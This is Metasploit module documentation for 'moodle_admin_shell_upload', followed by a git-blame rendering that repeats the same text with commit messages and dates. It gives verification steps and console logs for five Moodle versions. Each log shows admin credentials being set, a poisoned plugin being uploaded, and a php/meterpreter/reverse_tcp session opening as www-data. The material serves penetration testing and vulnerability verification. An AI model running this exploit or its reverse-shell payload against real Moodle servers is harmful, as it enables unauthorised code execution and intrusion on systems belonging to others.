documentation/modules/exploit/multi/http/moodle_admin_shell_upload.md

## Vulnerable Application

This module will generate a plugin which can receive a malicious
payload request and upload it to a server running Moodle
provided valid admin credentials are used.  Then the payload
is sent for execution, and the plugin uninstalled.

You must have an admin account to exploit this vulnerability.

Successfully tested against 3.6.3, 3.8.0, 3.9.0, 3.10.0, 3.11.2

## Verification Steps

1. Install moodle
1. Start msfconsole
1. Do: `use exploits/multi/http/moodle_admin_shell_upload`
1. Do: `set username [username]`
1. Do: `set password [password]`
1. Do: `run`
1. You should get a shell.

## Options

### Username

Username for an admin user. Default is `admin`

### Password

Password for an admin user

## Scenarios

### Moodle 3.8.0 on Ubuntu 20.04

```
resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload
[*] Using configured payload php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (moodle_upload.rb)> set username admin
username => admin
resource (moodle_upload.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_upload.rb)> set targeturi /moodle-3.8.0/
targeturi => /moodle-3.8.0/
resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set lhost eth0
lhost => eth0
resource (moodle_upload.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 3.8 detected
[*] Authenticating as user: admin
[+] Authentication was successful with user: admin
[*] Creating addon file
[*] Creating plugin named: oganetpo with poisoned header: YLYF
[*] Uploading addon
[+] Upload Successful.  Integrating addon
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56312) at 2021-09-02 17:05:39 -0400
[*] Uninstalling plugin

meterpreter > sysinfo
Computer    : moodle
OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data (33)
```

### Moodle 3.6.3 on Ubuntu 20.04

```
resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload
[*] Using configured payload php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (moodle_upload.rb)> set username admin
username => admin
resource (moodle_upload.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_upload.rb)> set targeturi /moodle-3.6.3/
targeturi => /moodle-3.6.3/
resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set lhost eth0
lhost => eth0
resource (moodle_upload.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 3.6.3 detected
[*] Authenticating as user: admin
[+] Authentication was successful with user: admin
[*] Creating addon file
[*] Creating plugin named: vnckinyr with poisoned header: BMDI
[*] Uploading addon
[+] Upload Successful.  Integrating addon
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56316) at 2021-09-02 17:09:41 -0400
[*] Uninstalling plugin

meterpreter > sysinfo
Computer    : moodle
OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data (33)
```

### Moodle 3.9.0 on Ubuntu 20.04

```
resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload
[*] Using configured payload php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (moodle_upload.rb)> set username admin
username => admin
resource (moodle_upload.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_upload.rb)> set targeturi /moodle-3.9.0/
targeturi => /moodle-3.9.0/
resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set lhost eth0
lhost => eth0
resource (moodle_upload.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 3.9 detected
[*] Authenticating as user: admin
[+] Authentication was successful with user: admin
[*] Creating addon file
[*] Creating plugin named: taztsyap with poisoned header: ARHW
[*] Uploading addon
[+] Upload Successful.  Integrating addon
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56318) at 2021-09-02 17:11:20 -0400
[*] Uninstalling plugin

meterpreter > sysinfo
Computer    : moodle
OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data (33)
```

### Moodle 3.10.0 on Ubuntu 20.04

```
resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload
[*] Using configured payload php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (moodle_upload.rb)> set username admin
username => admin
resource (moodle_upload.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_upload.rb)> set targeturi /moodle-3.10.0/
targeturi => /moodle-3.10.0/
resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set lhost eth0
lhost => eth0
resource (moodle_upload.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 3.10 detected
[*] Authenticating as user: admin
[+] Authentication was successful with user: admin
[*] Creating addon file
[*] Creating plugin named: yciymtns with poisoned header: YBIT
[*] Uploading addon
[+] Upload Successful.  Integrating addon
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56320) at 2021-09-02 17:16:52 -0400
[*] Uninstalling plugin

meterpreter > sysinfo
Computer    : moodle
OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data (33)
```

### Moodle 3.11.2 on Ubuntu 20.04

```
resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload
[*] Using configured payload php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (moodle_upload.rb)> set username admin
username => admin
resource (moodle_upload.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_upload.rb)> set targeturi /moodle-3.11.2/
targeturi => /moodle-3.11.2/
resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set lhost eth0
lhost => eth0
resource (moodle_upload.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 3.11.2 detected
[*] Authenticating as user: admin
[+] Authentication was successful with user: admin
[*] Creating addon file
[*] Creating plugin named: fwjdzsuj with poisoned header: ZLCW
[*] Uploading addon
[+] Upload Successful.  Integrating addon
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56326) at 2021-09-02 17:27:06 -0400
[*] Uninstalling plugin

meterpreter > sysinfo
Computer    : moodle
OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data (33)
```
moodle_admin_shell_upload working and minor other fixes 2021-08-29 16:59:44 -04:00			`## Vulnerable Application`

			`This module will generate a plugin which can receive a malicious`
			`payload request and upload it to a server running Moodle`
			`provided valid admin credentials are used. Then the payload`
			`is sent for execution, and the plugin uninstalled.`

			`You must have an admin account to exploit this vulnerability.`

			`Successfully tested against 3.6.3, 3.8.0, 3.9.0, 3.10.0, 3.11.2`

			`## Verification Steps`

			`1. Install moodle`
			`1. Start msfconsole`
			1. Do: `use exploits/multi/http/moodle_admin_shell_upload`
			1. Do: `set username [username]`
			1. Do: `set password [password]`
			1. Do: `run`
			`1. You should get a shell.`

			`## Options`

			`### Username`

			Username for an admin user. Default is `admin`

			`### Password`

			`Password for an admin user`

			`## Scenarios`

			`### Moodle 3.8.0 on Ubuntu 20.04`

			```
			`resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload`
more libs for moodle and teacher priv esc to rce module 2021-09-04 13:31:11 -04:00			`[*] Using configured payload php/meterpreter/reverse_tcp`
moodle_admin_shell_upload working and minor other fixes 2021-08-29 16:59:44 -04:00			`resource (moodle_upload.rb)> set rhosts 2.2.2.2`
			`rhosts => 2.2.2.2`
			`resource (moodle_upload.rb)> set username admin`
			`username => admin`
			`resource (moodle_upload.rb)> set password Adminadmin1!`
			`password => Adminadmin1!`
			`resource (moodle_upload.rb)> set targeturi /moodle-3.8.0/`
			`targeturi => /moodle-3.8.0/`
			`resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp`
			`payload => php/meterpreter/reverse_tcp`
			`resource (moodle_upload.rb)> set lhost eth0`
			`lhost => eth0`
			`resource (moodle_upload.rb)> exploit`
			`[*] Started reverse TCP handler on 1.1.1.1:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[+] The target appears to be vulnerable. Exploitable Moodle version 3.8 detected`
			`[*] Authenticating as user: admin`
			`[+] Authentication was successful with user: admin`
more libs for moodle and teacher priv esc to rce module 2021-09-04 13:31:11 -04:00			`[*] Creating addon file`
			`[*] Creating plugin named: oganetpo with poisoned header: YLYF`
			`[*] Uploading addon`
			`[+] Upload Successful. Integrating addon`
moodle_admin_shell_upload working and minor other fixes 2021-08-29 16:59:44 -04:00			`[*] Triggering payload`
			`[*] Sending stage (39282 bytes) to 2.2.2.2`
more libs for moodle and teacher priv esc to rce module 2021-09-04 13:31:11 -04:00			`[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56312) at 2021-09-02 17:05:39 -0400`
moodle_admin_shell_upload working and minor other fixes 2021-08-29 16:59:44 -04:00			`[*] Uninstalling plugin`

			`meterpreter > sysinfo`
			`Computer : moodle`
			`OS : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64`
			`Meterpreter : php/linux`
more libs for moodle and teacher priv esc to rce module 2021-09-04 13:31:11 -04:00			`meterpreter > getuid`
			`Server username: www-data (33)`
moodle_admin_shell_upload working and minor other fixes 2021-08-29 16:59:44 -04:00			```

			`### Moodle 3.6.3 on Ubuntu 20.04`

			```
			`resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload`
more libs for moodle and teacher priv esc to rce module 2021-09-04 13:31:11 -04:00			`[*] Using configured payload php/meterpreter/reverse_tcp`
moodle_admin_shell_upload working and minor other fixes 2021-08-29 16:59:44 -04:00			`resource (moodle_upload.rb)> set rhosts 2.2.2.2`
			`rhosts => 2.2.2.2`
			`resource (moodle_upload.rb)> set username admin`
			`username => admin`
			`resource (moodle_upload.rb)> set password Adminadmin1!`
			`password => Adminadmin1!`
			`resource (moodle_upload.rb)> set targeturi /moodle-3.6.3/`
			`targeturi => /moodle-3.6.3/`
			`resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp`
			`payload => php/meterpreter/reverse_tcp`
			`resource (moodle_upload.rb)> set lhost eth0`
			`lhost => eth0`
			`resource (moodle_upload.rb)> exploit`
			`[*] Started reverse TCP handler on 1.1.1.1:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[+] The target appears to be vulnerable. Exploitable Moodle version 3.6.3 detected`
			`[*] Authenticating as user: admin`
			`[+] Authentication was successful with user: admin`
more libs for moodle and teacher priv esc to rce module 2021-09-04 13:31:11 -04:00			`[*] Creating addon file`
			`[*] Creating plugin named: vnckinyr with poisoned header: BMDI`
			`[*] Uploading addon`
			`[+] Upload Successful. Integrating addon`
moodle_admin_shell_upload working and minor other fixes 2021-08-29 16:59:44 -04:00			`[*] Triggering payload`
			`[*] Sending stage (39282 bytes) to 2.2.2.2`
more libs for moodle and teacher priv esc to rce module 2021-09-04 13:31:11 -04:00			`[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56316) at 2021-09-02 17:09:41 -0400`
moodle_admin_shell_upload working and minor other fixes 2021-08-29 16:59:44 -04:00			`[*] Uninstalling plugin`

			`meterpreter > sysinfo`
			`Computer : moodle`
			`OS : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64`
			`Meterpreter : php/linux`
more libs for moodle and teacher priv esc to rce module 2021-09-04 13:31:11 -04:00			`meterpreter > getuid`
			`Server username: www-data (33)`
moodle_admin_shell_upload working and minor other fixes 2021-08-29 16:59:44 -04:00			```

			`### Moodle 3.9.0 on Ubuntu 20.04`

			```
			`resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload`
more libs for moodle and teacher priv esc to rce module 2021-09-04 13:31:11 -04:00			`[*] Using configured payload php/meterpreter/reverse_tcp`
moodle_admin_shell_upload working and minor other fixes 2021-08-29 16:59:44 -04:00			`resource (moodle_upload.rb)> set rhosts 2.2.2.2`
			`rhosts => 2.2.2.2`
			`resource (moodle_upload.rb)> set username admin`
			`username => admin`
			`resource (moodle_upload.rb)> set password Adminadmin1!`
			`password => Adminadmin1!`
			`resource (moodle_upload.rb)> set targeturi /moodle-3.9.0/`
			`targeturi => /moodle-3.9.0/`
			`resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp`
			`payload => php/meterpreter/reverse_tcp`
			`resource (moodle_upload.rb)> set lhost eth0`
			`lhost => eth0`
			`resource (moodle_upload.rb)> exploit`
			`[*] Started reverse TCP handler on 1.1.1.1:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[+] The target appears to be vulnerable. Exploitable Moodle version 3.9 detected`
			`[*] Authenticating as user: admin`
			`[+] Authentication was successful with user: admin`
more libs for moodle and teacher priv esc to rce module 2021-09-04 13:31:11 -04:00			`[*] Creating addon file`
			`[*] Creating plugin named: taztsyap with poisoned header: ARHW`
			`[*] Uploading addon`
			`[+] Upload Successful. Integrating addon`
moodle_admin_shell_upload working and minor other fixes 2021-08-29 16:59:44 -04:00			`[*] Triggering payload`
			`[*] Sending stage (39282 bytes) to 2.2.2.2`
more libs for moodle and teacher priv esc to rce module 2021-09-04 13:31:11 -04:00			`[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56318) at 2021-09-02 17:11:20 -0400`
moodle_admin_shell_upload working and minor other fixes 2021-08-29 16:59:44 -04:00			`[*] Uninstalling plugin`

			`meterpreter > sysinfo`
			`Computer : moodle`
			`OS : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64`
			`Meterpreter : php/linux`
more libs for moodle and teacher priv esc to rce module 2021-09-04 13:31:11 -04:00			`meterpreter > getuid`
			`Server username: www-data (33)`
moodle_admin_shell_upload working and minor other fixes 2021-08-29 16:59:44 -04:00			```

			`### Moodle 3.10.0 on Ubuntu 20.04`

			```
			`resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload`
more libs for moodle and teacher priv esc to rce module 2021-09-04 13:31:11 -04:00			`[*] Using configured payload php/meterpreter/reverse_tcp`
moodle_admin_shell_upload working and minor other fixes 2021-08-29 16:59:44 -04:00			`resource (moodle_upload.rb)> set rhosts 2.2.2.2`
			`rhosts => 2.2.2.2`
			`resource (moodle_upload.rb)> set username admin`
			`username => admin`
			`resource (moodle_upload.rb)> set password Adminadmin1!`
			`password => Adminadmin1!`
			`resource (moodle_upload.rb)> set targeturi /moodle-3.10.0/`
			`targeturi => /moodle-3.10.0/`
			`resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp`
			`payload => php/meterpreter/reverse_tcp`
			`resource (moodle_upload.rb)> set lhost eth0`
			`lhost => eth0`
			`resource (moodle_upload.rb)> exploit`
			`[*] Started reverse TCP handler on 1.1.1.1:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[+] The target appears to be vulnerable. Exploitable Moodle version 3.10 detected`
			`[*] Authenticating as user: admin`
			`[+] Authentication was successful with user: admin`
more libs for moodle and teacher priv esc to rce module 2021-09-04 13:31:11 -04:00			`[*] Creating addon file`
			`[*] Creating plugin named: yciymtns with poisoned header: YBIT`
			`[*] Uploading addon`
			`[+] Upload Successful. Integrating addon`
moodle_admin_shell_upload working and minor other fixes 2021-08-29 16:59:44 -04:00			`[*] Triggering payload`
			`[*] Sending stage (39282 bytes) to 2.2.2.2`
more libs for moodle and teacher priv esc to rce module 2021-09-04 13:31:11 -04:00			`[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56320) at 2021-09-02 17:16:52 -0400`
moodle_admin_shell_upload working and minor other fixes 2021-08-29 16:59:44 -04:00			`[*] Uninstalling plugin`

			`meterpreter > sysinfo`
			`Computer : moodle`
			`OS : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64`
			`Meterpreter : php/linux`
more libs for moodle and teacher priv esc to rce module 2021-09-04 13:31:11 -04:00			`meterpreter > getuid`
			`Server username: www-data (33)`
moodle_admin_shell_upload working and minor other fixes 2021-08-29 16:59:44 -04:00			```

			`### Moodle 3.11.2 on Ubuntu 20.04`

			```
			`resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload`
more libs for moodle and teacher priv esc to rce module 2021-09-04 13:31:11 -04:00			`[*] Using configured payload php/meterpreter/reverse_tcp`
moodle_admin_shell_upload working and minor other fixes 2021-08-29 16:59:44 -04:00			`resource (moodle_upload.rb)> set rhosts 2.2.2.2`
			`rhosts => 2.2.2.2`
			`resource (moodle_upload.rb)> set username admin`
			`username => admin`
			`resource (moodle_upload.rb)> set password Adminadmin1!`
			`password => Adminadmin1!`
			`resource (moodle_upload.rb)> set targeturi /moodle-3.11.2/`
			`targeturi => /moodle-3.11.2/`
			`resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp`
			`payload => php/meterpreter/reverse_tcp`
			`resource (moodle_upload.rb)> set lhost eth0`
			`lhost => eth0`
			`resource (moodle_upload.rb)> exploit`
			`[*] Started reverse TCP handler on 1.1.1.1:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[+] The target appears to be vulnerable. Exploitable Moodle version 3.11.2 detected`
			`[*] Authenticating as user: admin`
			`[+] Authentication was successful with user: admin`
more libs for moodle and teacher priv esc to rce module 2021-09-04 13:31:11 -04:00			`[*] Creating addon file`
			`[*] Creating plugin named: fwjdzsuj with poisoned header: ZLCW`
			`[*] Uploading addon`
			`[+] Upload Successful. Integrating addon`
moodle_admin_shell_upload working and minor other fixes 2021-08-29 16:59:44 -04:00			`[*] Triggering payload`
			`[*] Sending stage (39282 bytes) to 2.2.2.2`
more libs for moodle and teacher priv esc to rce module 2021-09-04 13:31:11 -04:00			`[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56326) at 2021-09-02 17:27:06 -0400`
moodle_admin_shell_upload working and minor other fixes 2021-08-29 16:59:44 -04:00			`[*] Uninstalling plugin`

			`meterpreter > sysinfo`
			`Computer : moodle`
			`OS : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64`
			`Meterpreter : php/linux`
more libs for moodle and teacher priv esc to rce module 2021-09-04 13:31:11 -04:00			`meterpreter > getuid`
			`Server username: www-data (33)`
moodle_admin_shell_upload working and minor other fixes 2021-08-29 16:59:44 -04:00			```